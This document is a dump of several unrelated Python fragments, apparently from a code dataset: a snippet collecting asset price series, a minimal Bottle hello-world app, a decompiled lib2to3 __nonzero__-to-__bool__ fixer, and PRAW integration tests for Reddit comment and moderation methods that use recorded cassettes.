        series = get_series(entry['id'], 'd1')  # With d1 as interval, we select daily prices
        collected.append(Asset(entry['symbol'], series))
    return tuple(collected)
|
from bottle import route, default_app
@route("/")
def hello():
    # Root endpoint: returns a plain-text greeting.
    return 'hello world!!'
# WSGI callable exported for the hosting server to mount.
application = default_app()
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: fix_nonzero.py
"""Fixer for __nonzero__ -> __bool__ methods."""
from .. import fixer_base
from ..fixer_util import Name, syms
class FixNonzero(fixer_base.BaseFix):
    """lib2to3 fixer that renames a class's `__nonzero__` method to `__bool__`."""
    BM_compatible = True  # participate in the bottom-matcher pattern engine
    PATTERN = "\n    classdef< 'class' any+ ':'\n              suite< any*\n                     funcdef< 'def' name='__nonzero__'\n                              parameters< '(' NAME ')' > any+ >\n                     any* > >\n    "
    def transform(self, node, results):
        # `name` is the Name leaf captured as '__nonzero__' by PATTERN.
        name = results['name']
        # Keep the original whitespace prefix so formatting is preserved.
        new = Name('__bool__', prefix=name.prefix)
        name.replace(new)
import mock
import pytest
from praw.exceptions import ClientException, PRAWException, RedditAPIException
from praw.models import Comment, Submission
from ... import IntegrationTest
class TestComment(IntegrationTest):
    """Integration tests for ``praw.models.Comment``.

    HTTP traffic is replayed from pre-recorded cassettes via
    ``self.recorder``; tests that write data disable ``read_only`` first,
    and ``time.sleep`` is mocked out where the client would rate-limit.
    """
    def test_attributes(self):
        with self.recorder.use_cassette("TestComment.test_attributes"):
            comment = Comment(self.reddit, "cklhv0f")
            assert comment.author == "bboe"
            assert comment.body.startswith("Yes it does.")
            assert not comment.is_root
            assert comment.submission == "2gmzqe"
    @mock.patch("time.sleep", return_value=None)
    def test_block(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_block"):
            comment = None
            # Find a reply authored by someone else; fail if none exists.
            for item in self.reddit.inbox.submission_replies():
                if item.author and item.author != pytest.placeholders.username:
                    comment = item
                    break
            else:
                assert False, "no comment found"
            comment.block()
    def test_clear_vote(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_clear_vote"):
            Comment(self.reddit, "d1680wu").clear_vote()
    @mock.patch("time.sleep", return_value=None)
    def test_delete(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_delete"):
            comment = Comment(self.reddit, "d1616q2")
            comment.delete()
            assert comment.author is None
            assert comment.body == "[deleted]"
    def test_disable_inbox_replies(self):
        self.reddit.read_only = False
        comment = Comment(self.reddit, "dcc9snh")
        with self.recorder.use_cassette(
            "TestComment.test_disable_inbox_replies"
        ):
            comment.disable_inbox_replies()
    def test_downvote(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_downvote"):
            Comment(self.reddit, "d1680wu").downvote()
    @mock.patch("time.sleep", return_value=None)
    def test_edit(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_edit"):
            comment = Comment(self.reddit, "d1616q2")
            comment.edit("New text")
            assert comment.body == "New text"
    def test_enable_inbox_replies(self):
        self.reddit.read_only = False
        comment = Comment(self.reddit, "dcc9snh")
        with self.recorder.use_cassette(
            "TestComment.test_enable_inbox_replies"
        ):
            comment.enable_inbox_replies()
    def test_gild__no_creddits(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_gild__no_creddits"):
            with pytest.raises(RedditAPIException) as excinfo:
                Comment(self.reddit, "d1616q2").gild()
            exception = excinfo.value
            assert "INSUFFICIENT_CREDDITS" == exception.error_type
    def test_invalid(self):
        with self.recorder.use_cassette("TestComment.test_invalid"):
            with pytest.raises(PRAWException) as excinfo:
                Comment(self.reddit, "0").body
            assert excinfo.value.args[0].startswith(
                "No data returned for comment"
            )
    @mock.patch("time.sleep", return_value=None)
    def test_mark_read(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_mark_read"):
            comment = next(self.reddit.inbox.unread())
            assert isinstance(comment, Comment)
            comment.mark_read()
    @mock.patch("time.sleep", return_value=None)
    def test_mark_unread(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_mark_unread"):
            comment = next(self.reddit.inbox.comment_replies())
            comment.mark_unread()
    def test_parent__comment(self):
        comment = Comment(self.reddit, "cklhv0f")
        with self.recorder.use_cassette("TestComment.test_parent__comment"):
            parent = comment.parent()
            parent.refresh()
            assert comment in parent.replies
        assert isinstance(parent, Comment)
        assert parent.fullname == comment.parent_id
    def test_parent__chain(self):
        comment = Comment(self.reddit, "dkk4qjd")
        counter = 0
        with self.recorder.use_cassette("TestComment.test_parent__chain"):
            comment.refresh()
            parent = comment.parent()
            # Walk up the whole ancestor chain, refreshing every 9th hop.
            while parent != comment.submission:
                if counter % 9 == 0:
                    parent.refresh()
                counter += 1
                parent = parent.parent()
    def test_parent__comment_from_forest(self):
        submission = self.reddit.submission("2gmzqe")
        with self.recorder.use_cassette(
            "TestComment.test_parent__comment_from_forest"
        ):
            comment = submission.comments[0].replies[0]
        parent = comment.parent()
        assert comment in parent.replies
        assert isinstance(parent, Comment)
        assert parent.fullname == comment.parent_id
    @mock.patch("time.sleep", return_value=None)
    def test_parent__from_replies(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.parent__from_replies"):
            comment = next(self.reddit.inbox.comment_replies())
            parent = comment.parent()
        assert isinstance(parent, Comment)
        assert parent.fullname == comment.parent_id
    def test_parent__submission(self):
        comment = Comment(self.reddit, "cklfmye")
        with self.recorder.use_cassette("TestComment.test_parent__submission"):
            parent = comment.parent()
            assert comment in parent.comments
        assert isinstance(parent, Submission)
        assert parent.fullname == comment.parent_id
    def test_refresh(self):
        comment = Comment(self.reddit, "d81vwef")
        with self.recorder.use_cassette("TestComment.test_refresh"):
            assert len(comment.replies) == 0
            comment.refresh()
            assert len(comment.replies) > 0
    def test_refresh__raises_exception(self):
        with self.recorder.use_cassette(
            "TestComment.test_refresh__raises_exception"
        ):
            with pytest.raises(ClientException) as excinfo:
                Comment(self.reddit, "d81vwef").refresh()
        assert (
            "This comment does not appear to be in the comment tree",
        ) == excinfo.value.args
    def test_refresh__twice(self):
        with self.recorder.use_cassette("TestComment.test_refresh__twice"):
            Comment(self.reddit, "d81vwef").refresh().refresh()
    def test_refresh__deleted_comment(self):
        with self.recorder.use_cassette(
            "TestComment.test_refresh__deleted_comment"
        ):
            with pytest.raises(ClientException) as excinfo:
                Comment(self.reddit, "d7ltvl0").refresh()
        assert (
            "This comment does not appear to be in the comment tree",
        ) == excinfo.value.args
    def test_refresh__removed_comment(self):
        with self.recorder.use_cassette(
            "TestComment.test_refresh__removed_comment"
        ):
            with pytest.raises(ClientException) as excinfo:
                Comment(self.reddit, "dma3mi5").refresh()
        assert (
            "This comment does not appear to be in the comment tree",
        ) == excinfo.value.args
    def test_refresh__with_reply_sort_and_limit(self):
        with self.recorder.use_cassette(
            "TestComment.test_refresh__with_reply_sort_and_limit"
        ):
            comment = Comment(self.reddit, "e4j4830")
            comment.reply_limit = 4
            comment.reply_sort = "new"
            comment.refresh()
            replies = comment.replies
        last_created = float("inf")
        # Verify replies arrive newest-first (monotonically decreasing).
        for reply in replies:
            if isinstance(reply, Comment):
                if reply.created_utc > last_created:
                    assert False, "sort order incorrect"
                last_created = reply.created_utc
        assert len(comment.replies) == 3
    def test_reply(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_reply"):
            parent_comment = Comment(self.reddit, "d1616q2")
            comment = parent_comment.reply("Comment reply")
            assert comment.author == self.reddit.config.username
            assert comment.body == "Comment reply"
            assert not comment.is_root
            assert comment.parent_id == parent_comment.fullname
    def test_reply__none(self):
        self.reddit.read_only = False
        comment = Comment(self.reddit, "eear2ml")
        with self.recorder.use_cassette("TestComment.test_reply__none"):
            reply = comment.reply("TEST")
        assert reply is None
    def test_report(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_report"):
            Comment(self.reddit, "d0335z3").report("custom")
    def test_save(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_save"):
            Comment(self.reddit, "d1680wu").save("foo")
    def test_unsave(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_unsave"):
            Comment(self.reddit, "d1680wu").unsave()
    def test_upvote(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestComment.test_upvote"):
            Comment(self.reddit, "d1680wu").upvote()
class TestCommentModeration(IntegrationTest):
    """Integration tests for ``Comment.mod`` (moderator actions).

    All network traffic is replayed from pre-recorded cassettes via
    ``self.recorder``; every action requires ``read_only`` to be off.
    """
    def test_approve(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestCommentModeration.test_approve"):
            Comment(self.reddit, "da2g5y6").mod.approve()
    def test_distinguish(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_distinguish"
        ):
            Comment(self.reddit, "da2g5y6").mod.distinguish()
    @mock.patch("time.sleep", return_value=None)
    def test_distinguish__sticky(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_distinguish__sticky"
        ):
            Comment(self.reddit, "da2g5y6").mod.distinguish(sticky=True)
    def test_ignore_reports(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_ignore_reports"
        ):
            self.reddit.comment("da2g5y6").mod.ignore_reports()
    def test_lock(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestCommentModeration.test_lock"):
            Comment(self.reddit, "da2g6ne").mod.lock()
    def test_remove(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestCommentModeration.test_remove"):
            self.reddit.comment("da2g5y6").mod.remove(spam=True)
    @mock.patch("time.sleep", return_value=None)
    def test_remove_with_reason_id(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_remove_with_reason_id"
        ):
            self.reddit.comment("f3dm3b7").mod.remove(
                reason_id="110nhral8vygf"
            )
    def test_show(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestCommentModeration.test_show"):
            self.reddit.comment("fjyyrv6").mod.show()
    def test_unlock(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette("TestCommentModeration.test_unlock"):
            Comment(self.reddit, "da2g6ne").mod.unlock()
    @mock.patch("time.sleep", return_value=None)
    def test_add_removal_reason(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_add_removal_reason"
        ):
            comment = self.reddit.comment("f98ukt5")
            comment.mod.remove()
            comment.mod._add_removal_reason(
                mod_note="Blah", reason_id="110nhral8vygf"
            )
    @mock.patch("time.sleep", return_value=None)
    def test_add_removal_reason_without_id(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_add_removal_reason_without_id"
        ):
            comment = self.reddit.comment("f98ugot")
            comment.mod.remove()
            comment.mod._add_removal_reason(mod_note="Test")
    @mock.patch("time.sleep", return_value=None)
    def test_add_removal_reason_without_id_or_note(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_add_removal_reason_invalid"
        ):
            # Supplying neither a reason id nor a note must be rejected.
            with pytest.raises(ValueError) as excinfo:
                comment = self.reddit.comment("f9974ce")
                comment.mod.remove()
                comment.mod._add_removal_reason()
            assert excinfo.value.args[0].startswith("mod_note cannot be blank")
    @mock.patch("time.sleep", return_value=None)
    def test_send_removal_message(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_send_removal_message"
        ):
            comment = self.reddit.comment("edu698v")
            mod = comment.mod
            mod.remove()
            message = "message"
            # Only the "public" variant returns a Comment; the private
            # variants return None.
            res = [
                mod.send_removal_message(message, "title", type)
                for type in ("public", "private", "private_exposed")
            ]
            assert isinstance(res[0], Comment)
            assert res[0].parent_id == "t1_" + comment.id
            assert res[0].body == message
            assert res[1] is None
            assert res[2] is None
    @mock.patch("time.sleep", return_value=None)
    def test_send_removal_message__error(self, _):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_send_removal_message__error"
        ):
            comment = self.reddit.comment("fkmrn4a")
            comment.mod.remove()
            with pytest.raises(RedditAPIException) as excinfo:
                comment.mod.send_removal_message("message", "a" * 51)
            exception = excinfo.value
            assert "title" == exception.field
            assert "TOO_LONG" == exception.error_type
    def test_undistinguish(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_undistinguish"
        ):
            self.reddit.comment("da2g5y6").mod.undistinguish()
    def test_unignore_reports(self):
        self.reddit.read_only = False
        with self.recorder.use_cassette(
            "TestCommentModeration.test_unignore_reports"
        ):
            self.reddit.comment("da2g5y6").mod.unignore_reports()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.